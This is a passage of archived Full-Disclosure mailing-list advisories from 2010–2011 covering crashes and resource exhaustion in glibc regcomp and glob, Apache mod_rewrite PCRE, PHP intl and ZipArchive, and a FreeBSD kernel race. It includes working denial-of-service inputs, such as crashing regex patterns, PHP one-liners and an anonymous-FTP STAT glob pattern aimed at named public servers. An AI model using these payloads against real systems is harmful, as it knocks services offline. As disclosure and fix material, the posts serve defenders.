mov%rax,(%rdi) (gdb) x/x $rax 0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70 (gdb) x/x $rdi 0x11b2000: Cannot access memory at address 0x11b2000 (gdb) r -r 'grapheme_extract('aaa',-1);' ... (gdb) x/i $rip => 0x75511d77 : mov0x18(%rsi),%r10 (gdb) x/x $rsi 0x11b1fe8: 0x - --- 3. Fix --- CVS http://svn.php.net/viewvc?view=revision&revision=306449 - --- 4. Greets --- Pierre, Stas, sp3x, infospec - --- 5. Contact --- Author: Maksymilian Arciemowicz [ SecurityReason.com ] Email: - - cxib {a\./t]securityreason[d=t} com GPG: - - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://cxib.net/ - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJNXFm7AAoJEIO8+dzW5bUwqowP/iP7Hx8HCvX5YrZk9b1UzU81 imYH1r7m5Xs0SkPpPeT0UwYH9MTYI04UeD2cskkBwdCTBRNPEQlRNhJIN7WzxjYv WGH9vyE7VQD0x3oeSszFRHFdGGQ13qVmfBXJfDk8K1UiLsgabvdr6M69keRB7GqU tX/2z97P+hWuEuCmjDcFmqeGwpjxPF+4omupq5BavY6KBQTxjfw3ECLb4gAxYDko PC2uKXZ6iEuqHEeUElTpRnQFTCnToKIPRfogCkN9+m8hLcdrnEnGQc1sdxHXgVqk nR+RCxA5ph5BO1d3ceQg8e2BpRT9vAIXyQI3UWD5N6O2Go7TO5T3NAdliBe3aVVf 7Awd3UCdeX50bDLzs55yACAqjinAzOoLVbEKVHBR/S6ogSsNp+4wkkDUhdj8G6s9 EUEY2qlNBJe5bTenzV5oXgpZ9lPuTSlbRjogdXtmhHBhv3nCIO2kLr0QZ293QsHZ TGp/jmhuiu67dIIgtnObZOIckmcYZZukQeOOjThvTqia0dlrOi3QK9/deTISAESc HHRMpgz52ptnUTg8G8p0uvpkwa/riW4WE9tXN9LVQxPUmboMcuTrCQ1WMCgQit9R i8ALu1+4RJnErC/Q0CdBZcEFnnFxOOoTPSen6SSFRFnY1uwCklGtQPpJdcgXfpBN 9aCz02ztmFBMPO+/YTzb =H8sm -END PGP SIGNATURE- 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 01/11/2011 04:33 PM, halfdog wrote: > > Nice find, but not the first one, look at: > > https://bugs.launchpad.net/ubuntu/+source/glibc/+bug/343894 > > I just reported the issue to ubuntu so see how their bug tracking team > was performing on an issue where a standard byte-array-fuzzer just > needed 2secs to find it. I wanted to know, if they could detect a > misclassified issue (was not reported as security bug) and bring it to a > fix. I would have bet, that they would be faster than you, but it seems > that you made the race. What I learned from the excercise (see bug > report date March 2009), is that the ubuntu launchpad platform is an > invaluable source of exploits when used together with google mining. I agree with you but in my opinion ubuntu tracking team has here nothing to do. Main problem exists in the GNU libc code so this team should fix the problem. Just compare the regcomp(3)/BSD and regcomp (3)/linux. In my opinion the GNU libc implementation is the worst in terms of safety. Probably vulnerability in glob(3) (CVE-2010-2632) can be used to resource exhasusion in GNU inetutils ftp server. - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJNLKCKAAoJEIO8+dzW5bUw3JcP/jnau2AewihKbwSjQB5x3Civ fDL/LS2i+HRP+lMsmVsGqMpZN3kebdhm4M4/ZqTxQsVdAkBA9Ky5qL61nvz/BnVq IAU/JYd+5pt5NX4y3Qlcbwrcv1DgleZen4X7zP6hpQ2OuJd2iGvsTFqv7gq1g2pr CXhurbGP4v+ANZZJIq60D1LvKxjZ/lFAfkhJP5gTIF/l1QK0CmGTbWQdKxcxh4Rl ECT+k5LUNVA6dWSmnRzf+npKaIuEcxE5ckrkoRqccIyEYQJNLRImczSkmvATB5fi 1RaY7dFW135xrVZnYukJrq02lTGZHNfyQH6oVY8gzSATAJiM8ax59H37hV/6KNyN N5khIGHbgufoVF6n1R4LAbLlIVLzyJnlenMRS7HRFfYIJghYxwgNUhSop3q2ShRq qxfSaPsw0SihDP/bw5Y1XGsUIbk/sWbp4V1+TyROmO9sfW9+Ye7SC6yGV0kqghxc OkZSpWzT/Mj+MZZNc3FLj2qPspbC22tuapL0Bp6Ywe7KpSrVcf5NAc2BOxEsqYr9 2D21u4trRzUaNe/Aw7PGqZoWM9abvFKN74kLGJ1UOhgTNjziX4HZHMZf2c5laUDu LYYEfvUWASR/lT4xJiK/VvS320175rRPLq6MRpQNu7M+mwcLvKOfDeSVxLT9lsXx /biFVUcPpSviVnPNTn1W =xmsD -END PGP SIGNATURE- 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ GNU libc/regcomp(3) Multiple Vulnerabilities ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 01.10.2010 - - Pub.: 07.01.2011 CERT: VU#912279 CVE: CVE-2010-4051 CVE-2010-4052 Affected (tested): - - Ubuntu 10.10 - - Slackware 13 - - Gentoo 18.10.2010 - - FreeBSD 8.1 (grep(1)) - - NetBSD 5.0.2 (grep(1)) Original URL: http://securityreason.com/achievement_securityalert/93 Exploit for proftpd: http://cxib.net/stuff/proftpd.gnu.c - --- 0.Description --- The GNU C library is used as the C library in the GNU system and most systems with the Linux kernel. # define RE_DUP_MAX (0x7fff) regcomp() is used to compile a regular expression into a form that is suitable for subsequent regexec() searches. - --- 1. RE_DUP_MAX overflow --- The main problem exists in regcomp(3) function of GNU libc implementation. Let`s try understand.. - --- int regcomp (preg, pattern, cflags) regex_t *__restrict preg; const char *__restrict pattern; int cflags; { - --- if we use '{', token type will be OP_OPEN_DUP_NUM. - --- /* This function parse repetition operators like "*", "+", "{1,3}" etc. */ static bin_tree_t * parse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa, re_token_t *token, reg_syntax_t syntax, reg_errcode_t *err) { bin_tree_t *tree = NULL, *old_tree = NULL; int i, start, end, start_idx = re_string_cur_idx (regexp); re_token_t start_token = *token; if (token->type == OP_OPEN_DUP_NUM) { end = 0; start = fetch_number (regexp, token, syntax); <= CONVERT VALUE - --- let`s see fetch_number => - --- static int fetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax) { int num = -1; unsigned char c; while (1) { fetch_token (token, input, syntax); c = token->opr.c; if (BE (token->type == END_OF_RE, 0)) return -2; if (token->type == OP_CLOSE_DUP_NUM || c == ',') break; num = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2) ? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0')); num = (num > RE_DUP_MAX) ? -2 : num; } return num; } - --- now see regex.h to know, what value have RE_DUP_MAX - --- /* Maximum number of duplicates an interval can allow. Some systems (erroneously) define this in other header files, but we want our value, so remove any previous define. */ # ifdef RE_DUP_MAX # undef RE_DUP_MAX # endif /* If sizeof(int) == 2, then ((1 << 15) - 1) overflows. */ # define RE_DUP_MAX (0x7fff) #endif - --- calc_eclosure_iter() will call to calc_eclosure_iter() match time. and crash in malloc(3). Simple Recursion. so we can't use value bigger 0x7fff in {n,}. regcomp(3) should return ERROR if we use more that one time '{' token. They are many vectors attack grep(1): c...@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}" Segmentation fault pgrep(1): c...@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}" Segmentation fault bregex from bacula-director-common c...@cx64:~$ bregex -f glob-0day.c Enter regex pattern: .*{10,}{10,}{10,}{10,}{10,} Segmentation fault whatis(1): c...@cx64:~$ whatis -r ".*{10,}{10,}{10,}{10,}{10,}" Segmentation fault and more like proftpd. Simple crash for CVE-2010-4051 (gdb) x/i $rip => 0x77ad3ea2: mov%eax,0x50(%rsp) (gdb) x/i $eax 0x2: Cannot access memory at address 0x2 (gdb) x/i $rsp 0x7f5fef90: Cannot access memory at address 0x7f5fef90 (gdb) x/i 0x50($rsp) Cannot access memory at address 0x7f5fef08 #0 0x77ad3ea2 in ?? () from /lib/libc.so.6 #1 0x77ad538e in malloc () from /lib/libc.so.6 #2 0x77b17d9b in ?? () from /lib/libc.so.6 #3 0x77b17f0b in ?? () from /lib/libc.so.6 #4 0x77b17f0b in ?? () from /lib/libc.so.6 #5 0x77b17f0b in ?? () from /lib/libc.so.6 #6 0x77b17f0b in ?? () from /lib/libc.so.6 #7 0x77b17f0b in ?? () from /lib/libc.so.6 ... - ---PoC1--- #include int main(){ regex_t preg; // char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052 char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; CVE-2010-4051 regcomp (&preg, fmt, REG_EXTENDED); return 0; } - ---PoC1--- - --- 2. Stack Exhausion --- This issue, may be also use to Denial of Service by stack exhausion #ls |grep -E ".*{10,}{10,}{11,}" - ---PoC2--- #include int main () { regex_t preg; char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052 // char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; // CVE-2010-4051 regcomp (&preg, fmt, REG_EXTENDED); return 0; } - ---PoC2--- Such a pattern may lead to allocate a large memory area, or large execution time As we can read in vsftpd/HACKING - --- - do
[Full-disclosure] Apache Insecure mod_rewrite PCRE Resource Exhaustion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Apache Insecure mod_rewrite PCRE Resource Exhaustion ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 19.09.2010 - - Pub.: 21.12.2010 Affected (tested): - - NetBSD 5.0.2 (Apache 2.2.17 PHP 5.3.4) - - Ubuntu 10.10 (Apache 2.2.16 PHP 5.3.3) Original URL: http://securityreason.com/achievement_securityalert/92 - --- 0.Description --- The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million web site milestone The PCRE(Perl Compatible Regular Expressions) library is a set of functions that implement regular expression pattern matching using the same syntax and semantics as Perl 5. PCRE has its own native API, as well as a set of wrapper functions that correspond to the POSIX regular expression API. The PCRE library is free, even for building proprietary software. - --- 1. Apache Insecure mod_rewrite PCRE Resource Exhaustion --- Using mod_rewrite and PCRE libs can be dangerous for stability apache server. Everybody know that using pcre regular expressions generate possible risk of DoS attack , and using multiple regular expressions in .htaccess is not good idea. I will show possibility DoS attack using .htaccess. Off course we can try configure our machine to be safe, anyway many servers are affected for this. Many versions of regular expressions, has no control over what executes. Example tags: let's see what will happen in firefox for this expression: .*.*.*(\w+)$1 Nothing special. Try this: .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(\w+)$1 result in Firefox javascirpt: "Warning: Unresponsive script" Long execution in pcre generate "Unresponsive script". That same algorithm we can use in .htaccess $ httpd -v && php -v Server version: Apache/2.2.17 (Unix) Server built: Nov 11 2010 19:51:37 PHP 5.3.4 (cli) (built: Nov 11 2010 17:17:35) Copyright (c) 1997-2010 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies $ pwd && ls -la /home/cx/public_html total 4 drwxrwxrwx 2 cx cx 512 Dec 19 01:10 . drwxr-xr-x 12 cx wheel 1024 Dec 19 01:10 .. $ vi poc.php $ ls -la . total 8 drwxrwxrwx 2 cx cx 512 Dec 19 01:16 . drwxr-xr-x 12 cx wheel 1024 Dec 19 01:10 .. - -rw-r--r-- 1 cx cx 2665 Dec 19 01:18 poc.php and remote request to poc.php c...@cx64:~$ curl http://172.16.124.128/~cx/poc.php on the server, any apache childs will stop in .htaccess (mod_rewrite => PCRE) # ps -aux -U www USER PID %CPU %MEM VSZ RSS TTY STAT STARTEDTIME COMMAND www 503 13.8 2.4 35620 27420 ? R 1:19AM 0:04.94 /usr/pkg/sbin/httpd -k start www 414 9.6 2.3 33572 25400 ? R 1:20AM 0:03.24 /usr/pkg/sbin/httpd -k start www 474 7.9 2.2 32548 24544 ? R 1:19AM 0:02.17 /usr/pkg/sbin/httpd -k start www 345 6.5 2.1 31524 23888 ? R 1:19AM 0:01.79 /usr/pkg/sbin/httpd -k start www 482 7.0 1.9 29476 21536 ? R 1:22AM 0:00.94 /usr/pkg/sbin/httpd -k start www 495 4.6 2.0 30500 22944 ? R 1:19AM 0:01.24 /usr/pkg/sbin/httpd -k start www 844 3.2 0.5 11980 5280 ? S 1:22AM 0:00.94 /usr/pkg/libexec/cgi-bin/php www 289 2.2 1.0 19236 10888 ? R 1:22AM 0:00.23 /usr/pkg/sbin/httpd -k start www 859 3.2 1.5 25380 17220 ? R 1:22AM 0:00.44 /usr/pkg/sbin/httpd -k start www 337 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 502 0.0 0.3 11988 3252 ? S 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 543 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 554 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 754 0.0 0.4 12068 3940 ? S 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 955 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 979 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start # ps -aux -U www USER PID %CPU %MEM VSZ RSS TTY STAT STARTEDTIME COMMAND www 389 4.0 1.9 29476 21360 ? R 1:22AM 0:00.80 /usr/pkg/sbin/httpd -k start www 455 4.3 1.8 28452 20080 ? R 1:22AM 0:00.55 /usr/pkg/sbin/httpd -k start www 712 4.9 1.8 27428 19688 ? R 1:22AM 0:00.51 /usr/pkg/sbin/httpd -k start www 516 3.8 2.1 31524 23632 ? R 1:22AM 0:02.05 /usr/pkg/sbin/httpd -k start ... www 1011 2.3 2.0 30500 21980 ? R 1:22AM 0:01.16 /usr/pkg/sbin/httpd -k start www 398 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 400 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 502 0.0 0.3 11988 3252 ? I 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 653 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 754 0.0 0.4 12068
[Full-disclosure] PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 11.11.2010 - - Pub.: 10.12.2010 CERT: VU#479900 CVE: CVE-2010-4409 CWE: CWE-189 Status: Fixed in PHP 5.3.4 Affected Software: - - PHP 5.3.3 Original URL: http://securityreason.com/achievement_securityalert/91 - --- 0.Description --- Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts. Number Formatter: allows to display number according to the localized format or given pattern or set of rules, and to parse strings into numbers. - --- 1. PoC for Integer Overflow --- $nx=new NumberFormatter("pl",1); $nx->getSymbol(2147483648); - --- 2. PHP 5.3.3/5.2.14 NumberFormatter::getSymbol Integer Overflow --- As we can see in - --- PHP_FUNCTION( numfmt_get_symbol ) { long symbol; UChar value_buf[4]; UChar *value = value_buf; int length = USIZE(value); FORMATTER_METHOD_INIT_VARS; /* Parse parameters. */ if( zend_parse_method_parameters( ZEND_NUM_ARGS() TSRMLS_CC, getThis(), "Ol", &object, NumberFormatter_ce_ptr, &symbol ) == FAILURE ) { intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR, "numfmt_get_symbol: unable to parse input params", 0 TSRMLS_CC ); RETURN_FALSE; } /* Fetch the object. */ FORMATTER_METHOD_FETCH_OBJECT; length = unum_getSymbol(FORMATTER_OBJECT(nfo), symbol, value_buf, length, &INTL_DATA_ERROR_CODE(nfo)); <= !!!TO BIG INT HERE!!! ... - --- will crash for differ value. example {292804, 2147483648, 2147483649, 2554462209} (when rdi out off band (range 2to31 2to32 under 64bits linux) Program received signal SIGSEGV, Segmentation fault. 0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42 (gdb) bt #0 0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42 #1 0x7fffee5d11c0 in zif_numfmt_get_symbol (ht=17168120, return_value=0x105c928, return_value_ptr=0x4, this_ptr=0x105f710, return_value_used=17168144) at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:269 ...blabla rip0x7fffedf317f5 0x7fffedf317f5 eflags 0x10206 [ PF IF RF ] let`s see value ~4294901761 $nx=new NumberFormatter("pl",1); $nx->getSymbol(4294901761); will crash in memcpy(3) ;] Program received signal SIGSEGV, Segmentation fault. memcpy () at ../sysdeps/x86_64/memcpy.S:90 90 ../sysdeps/x86_64/memcpy.S: No such file or directory. in ../sysdeps/x86_64/memcpy.S (gdb) bt #0 memcpy () at ../sysdeps/x86_64/memcpy.S:90 #1 0x7fffea74a86a in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42 #2 0x7fffeadea2b4 in zif_numfmt_get_symbol (ht=17826952, return_value=0x10fecd0, return_value_ptr=0xc, this_ptr=0x11004a0, return_value_used=17826976) at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:274 #3 0x006e986a in zend_do_fcall_common_helper_SPEC ( execute_data=0x77eb8068) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316 ... let's see ICU UnicodeString::extract(unsigned short*, int, UErrorCode&) - --- int32_t UnicodeString::extract(UChar *dest, int32_t destCapacity, UErrorCode &errorCode) const { int32_t len = length(); if(U_SUCCESS(errorCode)) { if(isBogus() || destCapacity<0 || (destCapacity>0 && dest==0)) { errorCode=U_ILLEGAL_ARGUMENT_ERROR; } else { const UChar *array = getArrayStart(); if(len>0 && len<=destCapacity && array!=dest) { uprv_memcpy(dest, array, len*U_SIZEOF_UCHAR); <=== MEMCPY REFERENCE HERE } return u_terminateUChars(dest, destCapacity, len, &errorCode); } } return len; } - --- so crash in rip=memcpy(3). Method getLocal() also can generate simple crash (CWE-170) $nx=new IntlDateFormatter("pl", IntlDateFormatter::FULL, IntlDateFormatter::FULL); $nx->getLocale(1); - --- 3. Fix --- Fix in next PHP Version 5.3.4: http://www.kb.cert.org/vuls/id/479900 SVN: http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/dateformat/dateformat_attr.c?view=log http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/formatter/formatter_attr.c?view=log - --- 4. Greets --- Special thanks for Pierre Joye and Stas Malyshev for very quickly fix Michael Orlando for security support and sp3x, Infospec - --- 5. Contact --- Au
[Full-disclosure] PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 14.09.2010 - - Pub.: 05.11.2010 CVE: CVE-2010-3709 CWE: CWE-476 Status: Fixed in CVS Affected Software: - - PHP 5.3.3 - - PHP 5.2.14 Original URL: http://securityreason.com/achievement_securityalert/90 - --- 0.Description --- ZipArchive enables you to transparently read or write ZIP compressed archives and the files inside them. ZipArchive::getArchiveComment ? Returns the Zip archive comment string ZipArchive::getArchiveComment ( void ) - --- 1. PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment (CWE-476) --- As we can see in http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?revision=303622&view=markup - --- 1945static ZIPARCHIVE_METHOD(getArchiveComment) 1946{ 1947struct zip *intern; 1948zval *this = getThis(); 1949long flags = 0; 1950const char * comment; 1951int comment_len = 0; 1952 1953if (!this) { 1954RETURN_FALSE; 1955} 1956 1957ZIP_FROM_OBJECT(intern, this); 1958 1959if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "|l", &flags) == FAILURE) { 1960return; 1961} 1962 1963comment = zip_get_archive_comment(intern, &comment_len, (int)flags); < RETURN NULL AND -1 1964RETURN_STRINGL((char *)comment, (long)comment_len, 1); <= NULL POINTER DEFERENCE HERE 1965} - --- this method return string from zip_get_archive_comment() function. Now we need see this function, http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_get_archive_comment.c?revision=284361&view=markup - --- 40 ZIP_EXTERN(const char *) 41 zip_get_archive_comment(struct zip *za, int *lenp, int flags) 42 { 43 if ((flags & ZIP_FL_UNCHANGED) 44 || (za->ch_comment_len == -1)) { 45 if (za->cdir) { 46 if (lenp != NULL) 47 *lenp = za->cdir->comment_len; 48 return za->cdir->comment; 49 } 50 else { 51 if (lenp != NULL) 52 *lenp = -1; <= -1 53 return NULL; < NULL 54 } 55 } 56 57 if (lenp != NULL) 58 *lenp = za->ch_comment_len; 59 return za->ch_comment; 60 } - --- line 52 and 53 should return NULL pointer and (int)-1. In result RETURN_STRINGL() will be executed with: RETURN_STRINGL(NULL, -1, 1); and crash in memcpy(3). - --- 2. PoC --- c...@cx64:/www$ touch empty.zip c...@cx64:/www$ php -r '$zip= new ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();' Segmentation fault Debug: c...@cx64:/www$ gdb -q php Reading symbols from /usr/bin/php...(no debugging symbols found)...done. (gdb) r -r '$zip= new ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();' Starting program: /usr/bin/php -r '$zip= new ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();' [Thread debugging using libthread_db enabled] Program received signal SIGSEGV, Segmentation fault. 0x7530edbb in memcpy () from /lib/libc.so.6 (gdb) bt #0 0x7530edbb in memcpy () from /lib/libc.so.6 #1 0x00679fa8 in _estrndup () #2 0x006371e5 in ?? () #3 0x006e793a in ?? () #4 0x006bec20 in execute () #5 0x0068b44a in zend_eval_stringl () #6 0x0068b5c9 in zend_eval_stringl_ex () #7 0x0072743e in ?? () #8 0x752a6c4d in __libc_start_main () from /lib/libc.so.6 #9 0x0042c6a9 in _start () (gdb) x/i $rip => 0x7530edbb : rep movsq %ds:(%rsi),%es:(%rdi) (gdb) x/x $rsi 0x0:Cannot access memory at address 0x0 (gdb) x/x $rbp 0x: Cannot access memory at address 0x - --- 3. Fix --- Fix: Replace 1963comment = zip_get_archive_comment(intern, &comment_len, (int)flags); 1964RETURN_STRINGL((char *)comment, (long)comment_len, 1); to 1963comment = zip_get_archive_comment(intern, &comment_len, (int)flags); 1964if(comment==NULL) RETURN_FALSE; 1965RETURN_STRINGL((char *)comment, (long)comment_len, 1); PHP 5.3: http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log PHP 5.2: http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/zip/php_zip.c?view=log MDVSA-2010:218 - --- 4. Greets --- Special thanks for Pierre Joye sp3x, Infospec, Adam Zabrocki 'pi3' - --- 5. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: - - cxib {a\./t] securityreason [d=t} com GPG: - - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://cxib.net/ - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 -BEGIN PGP SIGN
[Full-disclosure] Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon) ] Author: Maksymilian Arciemowicz http://netbsd.org/donations/ http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 06.11.2009 - - Pub.: 07.10.2010 CVE: CVE-2010-2632 Affected Software (verified): - - OpenBSD 4.7 - - NetBSD 5.0.2 - - FreeBSD 7.3/8.1 - - Oracle Sun Solaris 10 - - GNU Libc (glibc) Affected Ftp Servers: - - ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban) - - ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached" and ban) - - ftp.freebsd.org - - ftp.adobe.com - - ftp.hp.com - - ftp.sun.com - - more more and more Affected Vendors (not verified): - - Apple - - Microsoft Interix - - HP - - more more more Original URL: http://securityreason.com/achievement_securityalert/89 - --- 0.Description --- #include int glob(const char *pattern, int flags, int (*errfunc)(const char *epath, int eerrno), glob_t *pglob); Description This function expands a filename wildcard which is passed as pattern. GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX. This option should be set for programs that can be coerced to a denial of service attack via patterns that expand to a very large number of matches, such as a long string of */../*/.. - --- 1. Multiple Vendors libc/glob(3) resource exhaustion --- As we can read in definition GLOB_LIMIT: - -- Limit the amount of memory used by matches to ARG_MAX. This option should be set for programs that can be coerced to a denial of service attack via patterns that expand to a very large number of mat ches, such as a long string of */../*/.. - --- but now is comming question "what will happen when we use */.. without matching any results (simple searching)?" GLOB_LIMIT will be not overflowed. To realize it, we need only use pattern with many */.. and many inodes in current directory. On the end of pattern, we need add some not existed filename (like /cxib*). If we don't have many files or directories in attacked direcotry, we need create some dir-structure. Let's see again: http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c?rev=1.61.2.5&content-type=text/x-cvsweb-markup GLOB_LIMIT protect us before attacks like */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* because glob will find more patches as in GLOB_LIMIT declared. Anyway, if we use path what do not exists (with */.. strings) like */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*blablahaha GLOB_LIMIT will be never overflowed. Many combinations of paths, will execute this proces a long time. We can also try allocate (GLOB_LIMIT-1)*MAXPATHNAMELEN bytes per one process. ~200~300MB Example: > telnet ftp.netbsd.org 21 Trying 204.152.190.15... Connected to ftp.netbsd.org. Escape character is '^]'. 220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready. user anonymous 331 Guest login ok, type your name as password. pass a...@cxib 230- The NetBSD Project FTP Server located in Redwood City, CA, USA ... 230- EXPORT NOTICE ... 230 Guest login ok, access restrictions apply. stat {..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx this request will generate 100% usage of process a long time. ftpd come into glob(3) and will not fast out. Very similar sympthon was described in vulnerability for glibc strfmon(3) - - http://securityreason.com/achievement_securityalert/67 -- ... Interesting is that the PHP memory_limit has no control over what will happens in the level of the libc. Function strfmon(3) can allocate a lot of data in memory without control by PHP memory_limit. For example: php -r 'money_format("%.1343741821i",1);' will allocate ~1049MB real memory. memory_limit can be less that 1049M ... - - http://securityreason.com/achievement_securityalert/67 -- ftpd also dosen't control what will happen in libc. so it is enough to send - --- USER anonymous PASS STAT */..[calculated pattern] - --- and disconnect to connect again (bypass firewall limits). In php we can also bypass max_memory_limit by libc vulns. Attacking machine in this way, we can call the various side effects. - -kernel panic in netbsd502--- Jul 5 10:18:13 dhclient: DHCPACK from 192.168.92.254 Jul 5 10:18:14 dhclient: bound to 192.168.92.171 -- renewal in 886 seconds. Jul 5 10:22:43 syslogd: restart Jul 5 10:22:43 /netbsd: uvm_fault(0xcc2eb35c, 0, 2) -> 0xe Jul 5 10:22:43 /netbsd: fatal page fault in supervisor mode Jul 5 10:22:43 /netbsd: trap type 6 code 2 eip c07d9784 cs 8 eflags 10206 cr2 0 ilevel 0 Jul 5 10:22:43 /netbsd: panic: trap Jul 5 10:22:43 /netbsd: Begin traceback... Jul 5 10:22:43 /netbsd: End traceba
[Full-disclosure] FreeBSD 8.1/7.3 vm.pmap kernel local race condition
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ FreeBSD 8.1/7.3 vm.pmap kernel local race condition ] Author: Maksymilian Arciemowicz http://SecurityReason.com http://lu.cxib.net Date: - - Dis.: 09.07.2010 - - Pub.: 07.09.2010 Affected Software (verified): - - FreeBSD 7.3/8.1 Original URL: http://securityreason.com/achievement_securityalert/88 - --- 0.Description --- maxproc This is the maximum number of processes a user may be running. This includes foreground and background processes alike. For obvious reasons, this may not be larger than the system limit specified by the kern.maxproc sysctl(8). Also note that setting this too small may hinder a user's productivity: it is often useful to be logged in multiple times or execute pipelines. Some tasks, such as compiling a large program, also spawn multiple processes (e.g., make(1), cc(1), and other intermediate preprocessors). vm.pmap.shpgperproc - --- 1. FreeBSD 8.1/7.3 kernel local race condition --- Race condition in pmap, allows attackers to denial of service freebsd kernel. Creating a lot of process by fork() (~ kern.maxproc), it's possible to denial kernel. To bypass the MAXPROC from login.conf, we can use a few users to run PoC in this same time, to reach kern.maxproc. suphp can be very usefully. We need choose vector attack. 